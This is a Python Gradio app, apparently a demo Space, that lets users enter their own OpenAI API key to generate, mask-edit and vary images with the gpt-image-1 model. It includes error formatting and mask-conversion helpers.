from __future__ import annotations

import io
import json
import os
from typing import List, Optional, Union, Dict, Any

import gradio as gr
import numpy as np
from PIL import Image

import openai

# --- Constants and Helper Functions ---
MODEL = "gpt-image-1"
SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"]
QUALITY_CHOICES = ["auto", "low", "medium", "high"]
FORMAT_CHOICES = ["png", "jpeg", "webp"]


def _client(key: str) -> openai.OpenAI:
    """Initialize the OpenAI client with the provided API key."""
    api_key = key.strip() or os.getenv("OPENAI_API_KEY", "")
    if not api_key:
        raise gr.Error("Please enter your OpenAI API key (never stored)")
    return openai.OpenAI(api_key=api_key)


def _img_list(resp, *, fmt: str) -> List[str]:
    """Return a list of data URLs or direct URLs depending on the API response."""
    mime = f"image/{fmt}"
    return [
        f"data:{mime};base64,{d.b64_json}"
        if hasattr(d, "b64_json") and d.b64_json
        else d.url
        for d in resp.data
    ]


def _common_kwargs(
    prompt: Optional[str],
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
) -> Dict[str, Any]:
    """Prepare keyword arguments for the Images API based on the latest OpenAI spec."""
    kwargs: Dict[str, Any] = dict(
        model=MODEL,
        n=n,
    )
    if size != "auto":
        kwargs["size"] = size
    if quality != "auto":
        kwargs["quality"] = quality
    if prompt is not None:
        kwargs["prompt"] = prompt
    if out_fmt != "png":
        kwargs["output_format"] = out_fmt
    if transparent_bg and out_fmt in {"png", "webp"}:
        # Note: 'background' is assumed to be the correct parameter name; verify against the latest OpenAI docs.
        kwargs["background"] = "transparent"
    if out_fmt in {"jpeg", "webp"}:
        # Note: 'output_compression' is assumed to be the correct parameter name; verify against the latest OpenAI docs.
        kwargs["output_compression"] = int(compression)
    return kwargs

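# Illustrative only (not executed): for a call such as
#   _common_kwargs("a red fox", 2, "1024x1024", "high", "webp", 80, True)
# the payload assembled above is expected to look roughly like
#   {"model": "gpt-image-1", "n": 2, "prompt": "a red fox", "size": "1024x1024",
#    "quality": "high", "output_format": "webp", "background": "transparent",
#    "output_compression": 80}
# The parameter names mirror this file's assumptions; confirm them against the
# current Images API reference before relying on them.
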
# --- Helper Function to Format OpenAI Errors ---
def _format_openai_error(e: Exception) -> str:
    """Format OpenAI API errors for user display."""
    error_message = f"An error occurred: {type(e).__name__}"
    details = ""

    # Try to extract details from common OpenAI error attributes.
    if hasattr(e, "body") and e.body:
        try:
            body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
            if isinstance(body, dict) and isinstance(body.get("error"), dict) and "message" in body["error"]:
                details = body["error"]["message"]
            elif isinstance(body, dict) and "message" in body:
                # Some errors carry the message at the top level.
                details = body["message"]
        except (json.JSONDecodeError, TypeError):
            # Fallback if the body is not JSON or parsing fails.
            details = str(e.body)
    elif hasattr(e, "message") and e.message:
        details = e.message

    if details:
        error_message = f"OpenAI API Error: {details}"
    else:
        # Generic fallback if no specific details were found.
        error_message = f"An unexpected OpenAI error occurred: {str(e)}"

    # Add specific guidance for known error types.
    if isinstance(e, openai.AuthenticationError):
        error_message = "Invalid OpenAI API key. Please check your key."
    elif isinstance(e, openai.PermissionDeniedError):
        # Prepend standard advice, then add specific details if available.
        prefix = "Permission Denied."
        if "organization verification" in details.lower():
            prefix += " Your organization may need verification to use this feature/model."
        else:
            prefix += " Check your API key permissions and OpenAI account status."
        error_message = f"{prefix} Details: {details}" if details else prefix
    elif isinstance(e, openai.RateLimitError):
        error_message = "Rate limit exceeded. Please wait and try again later."
    elif isinstance(e, openai.BadRequestError):
        error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}"
        if "mask" in details.lower():
            error_message += " (Check mask format/dimensions)"
        if "size" in details.lower():
            error_message += " (Check image/mask dimensions)"
        if "model does not support variations" in details.lower():
            error_message += " (gpt-image-1 does not support variations)."

    # Optionally truncate if the message grows too long:
    # MAX_LEN = 300
    # if len(error_message) > MAX_LEN:
    #     error_message = error_message[:MAX_LEN] + "..."

    return error_message


# ---------- Generate ---------- #
def generate(
    api_key: str,
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
):
    """Call the OpenAI image generation endpoint."""
    if not prompt:
        raise gr.Error("Please enter a prompt.")

    try:
        client = _client(api_key)  # API key used here
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        # Optional debug:
        # print(f"[DEBUG] Generating with args: {common_args}")
        resp = client.images.generate(**common_args)
    except (openai.APIError, openai.OpenAIError) as e:
        # Catch OpenAI errors and format them for the UI.
        raise gr.Error(_format_openai_error(e))
    except Exception as e:
        # Avoid surfacing raw exception details in the UI; log them instead.
        print(f"Unexpected error during generation: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")

    return _img_list(resp, fmt=out_fmt)

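# Illustrative only (not executed): a successful images.generate call is assumed to return
# resp.data as a list of objects carrying either b64_json or url, e.g.
#   resp.data[0].b64_json -> "<base64-encoded image bytes>"
# which _img_list turns into "data:image/png;base64,<...>" strings for the galleries in this app.
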
# ---------- Edit / Inpaint ---------- #
def _bytes_from_numpy(arr: np.ndarray) -> bytes:
    """Convert an RGBA/RGB uint8 numpy array to PNG bytes."""
    img = Image.fromarray(arr.astype(np.uint8))
    out = io.BytesIO()
    img.save(out, format="PNG")
    return out.getvalue()


def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
    """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
    if mask_value is None:
        return None
    # Gradio ImageMask often returns a dict with 'image' and 'mask' numpy arrays.
    if isinstance(mask_value, dict):
        mask_array = mask_value.get("mask")
        if isinstance(mask_array, np.ndarray):
            return mask_array
    # Fallback for a direct numpy array (less common with ImageMask now).
    if isinstance(mask_value, np.ndarray):
        return mask_value
    return None  # No valid mask found.

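# Illustrative only (not executed), and dependent on the installed Gradio version:
# with type="numpy", the mask component is assumed to return a dict shaped like
#   {"image": <H x W x 3 uint8 array>, "mask": <H x W (x 4) uint8 array, painted pixels non-zero>}
# which _extract_mask_array reduces to just the mask array. Newer, ImageEditor-based
# Gradio releases may use different keys such as 'layers'/'composite'; adjust the
# helper above if the dict shape differs.
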
def edit_image(
    api_key: str,
    # Gradio Image component with type="numpy" provides the image array.
    image_numpy: Optional[np.ndarray],
    # Gradio ImageMask component provides a dict {'image': np.ndarray, 'mask': np.ndarray}.
    mask_dict: Optional[Dict[str, Any]],
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
):
    """Call the OpenAI image edit endpoint."""
    if image_numpy is None:
        raise gr.Error("Please upload an image.")
    if not prompt:
        raise gr.Error("Please enter an edit prompt.")

    img_bytes = _bytes_from_numpy(image_numpy)

    mask_bytes: Optional[bytes] = None
    mask_numpy = _extract_mask_array(mask_dict)

    if mask_numpy is not None:
        # Check whether the mask is effectively empty (all transparent or all black).
        is_empty = False
        if mask_numpy.ndim == 2:  # Grayscale mask
            is_empty = np.all(mask_numpy == 0)
        elif mask_numpy.shape[-1] == 4:  # RGBA mask: check the alpha channel
            is_empty = np.all(mask_numpy[:, :, 3] == 0)
        elif mask_numpy.shape[-1] == 3:  # RGB mask: check whether it is all black
            is_empty = np.all(mask_numpy == 0)

        if is_empty:
            gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.")
            mask_bytes = None  # Treat an empty mask as no mask.
        else:
            # Convert the mask provided by Gradio (usually white paint on a black or
            # transparent background) to the format OpenAI expects: an RGBA image in
            # which the area to be *edited* is transparent and everything else is opaque.
            #
            # Illustrative example: a 2x2 grayscale mask [[255, 0], [0, 0]] (white = painted)
            # becomes alpha [[0, 255], [255, 255]], so only the painted pixel is editable.
            if mask_numpy.ndim == 2:  # Grayscale: assume white marks the edit area
                alpha = (mask_numpy < 128).astype(np.uint8) * 255  # Non-edit area becomes opaque
            elif mask_numpy.shape[-1] == 4:  # RGBA: use the alpha channel directly
                alpha = mask_numpy[:, :, 3]
                # Invert: transparent where the user painted (edit area), opaque elsewhere.
                alpha = 255 - alpha
            elif mask_numpy.shape[-1] == 3:  # RGB: assume white marks the edit area
                # Treat pixels close to white [255, 255, 255] as the edit area.
                is_edit_area = np.all(mask_numpy > 200, axis=-1)
                alpha = (~is_edit_area).astype(np.uint8) * 255  # Non-edit area becomes opaque
            else:
                raise gr.Error("Unsupported mask format received from Gradio component.")

            # Create a valid RGBA PNG mask for OpenAI.
            mask_img = Image.fromarray(alpha, mode="L")

            # Ensure the mask size matches the image size (an OpenAI requirement).
            original_pil_image = Image.fromarray(image_numpy)
            if mask_img.size != original_pil_image.size:
                gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...")
                mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST)

            # Build the RGBA image carrying the calculated alpha.
            rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0))  # Start fully transparent
            rgba_mask.putalpha(mask_img)  # Non-edit areas become opaque

            out = io.BytesIO()
            rgba_mask.save(out, format="PNG")
            mask_bytes = out.getvalue()
    else:
        gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).")
        mask_bytes = None

    try:
        client = _client(api_key)  # API key used here
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        api_kwargs = {"image": img_bytes, **common_args}
        if mask_bytes is not None:
            api_kwargs["mask"] = mask_bytes
        else:
            # No mask provided: make sure no stale 'mask' key is sent.
            api_kwargs.pop("mask", None)
        # Optional debug:
        # print(f"[DEBUG] Editing with args: { {k: v if k not in ('image', 'mask') else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }")
        resp = client.images.edit(**api_kwargs)
    except (openai.APIError, openai.OpenAIError) as e:
        raise gr.Error(_format_openai_error(e))
    except Exception as e:
        print(f"Unexpected error during edit: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")

    return _img_list(resp, fmt=out_fmt)


# ---------- Variations ---------- #
def variation_image(
    api_key: str,
    image_numpy: Optional[np.ndarray],
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
):
    """Call the OpenAI image variations endpoint."""
    # Explicitly warn the user about model compatibility.
    gr.Warning("Note: Image Variations are officially supported for DALL·E 2, not gpt-image-1. This may fail or produce unexpected results.")
    if image_numpy is None:
        raise gr.Error("Please upload an image.")

    img_bytes = _bytes_from_numpy(image_numpy)

    try:
        client = _client(api_key)  # API key used here
        # Variations do not take a prompt, quality, background, or compression;
        # they primarily use n and size, so keep the arguments minimal.
        # Check the OpenAI docs for the exact parameters supported by the target model.
        var_args: Dict[str, Any] = dict(model=MODEL, n=n)  # Use the selected model
        if size != "auto":
            var_args["size"] = size
        if out_fmt != "png":
            var_args["response_format"] = "b64_json"  # Variations commonly use response_format
        # Optional debug:
        # print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }")
        resp = client.images.create_variation(image=img_bytes, **var_args)
    except (openai.APIError, openai.OpenAIError) as e:
        raise gr.Error(_format_openai_error(e))
    except Exception as e:
        print(f"Unexpected error during variation: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")

    # The variations response is assumed to share the same structure; adjust _img_list if needed.
    return _img_list(resp, fmt=out_fmt)


# ---------- UI ---------- #
def build_ui():
    with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo:
        gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
        gr.Markdown(
            "Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
            " This space uses the `gpt-image-1` model by default."
            " **Note:** Using `gpt-image-1` may require **Organization Verification** on your OpenAI account"
            " ([details](https://help.openai.com/en/articles/10910291-api-organization-verification))."
            " The **Variations** tab is unlikely to work correctly with `gpt-image-1` (the endpoint is designed for DALL·E 2)."
        )

        with gr.Accordion("🔐 API key", open=False):
            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")

        # Common controls
        with gr.Row():
            n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
            size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.")
            quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.")

        with gr.Row():
            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1)
            # Note: compression/transparency may not apply to every model or endpoint equally;
            # check the OpenAI docs for gpt-image-1 specifics if issues arise.
            compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1)

        def _toggle_compression(fmt):
            return gr.update(visible=fmt in {"jpeg", "webp"})

        out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)

        # Lists of common controls (excluding the API key) passed to the backend functions.
        common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent]
        # Variations use fewer controls; pass everything for now and let the function ignore what it doesn't need.
        common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent]

        with gr.Tabs():
            # ----- Generate Tab ----- #
            with gr.TabItem("Generate"):
                with gr.Row():
                    prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic ginger cat astronaut on Mars", scale=4)
                    btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
                gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
                btn_gen.click(
                    generate,
                    # API key first, then specific inputs, then common controls.
                    inputs=[api, prompt_gen] + common_controls_gen_edit,
                    outputs=gallery_gen,
                    api_name="generate",
                )

            # ----- Edit Tab ----- #
            with gr.TabItem("Edit / Inpaint"):
                gr.Markdown(
                    "Upload an image, then **paint the area to change** in the mask canvas below (white paint = edit area)."
                    " The API requires the mask and image to have the same dimensions; the app attempts to resize the mask if needed."
                )
                with gr.Row():
                    # Use type='pil' for easier handling, or keep 'numpy' if preferred.
                    img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"])
                    # ImageMask sends {'image': np.ndarray, 'mask': np.ndarray}.
                    mask_canvas = gr.ImageMask(
                        label="Mask – Paint White Where Image Should Change",
                        type="numpy",  # Keep numpy; _extract_mask_array expects it
                        height=400,
                    )
                with gr.Row():
                    prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky with a starry night", scale=4)
                    btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
                gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
                btn_edit.click(
                    edit_image,
                    # API key first, then specific inputs, then common controls.
                    inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit,
                    outputs=gallery_edit,
                    api_name="edit",
                )

            # ----- Variations Tab ----- #
            with gr.TabItem("Variations (DALL·E 2 Recommended)"):
                gr.Markdown(
                    "Upload an image to generate variations. **Warning:** This endpoint is officially supported for DALL·E 2,"
                    " not `gpt-image-1`. It likely won't work correctly or may error."
                )
                with gr.Row():
                    img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4)
                    btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
                gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
                btn_var.click(
                    variation_image,
                    # API key first, then specific inputs, then common controls.
                    inputs=[api, img_var] + common_controls_var,
                    outputs=gallery_var,
                    api_name="variations",
                )

    return demo


if __name__ == "__main__":
    app = build_ui()
    # Consider disabling debug for production/sharing.
    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")
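# Rough local usage sketch (assumed dependency set, versions not pinned):
#   pip install gradio openai pillow numpy
#   python app.py    # the filename is assumed; adjust to however this module is saved
# Then open the printed local URL, paste an OpenAI API key in the accordion, and use the tabs.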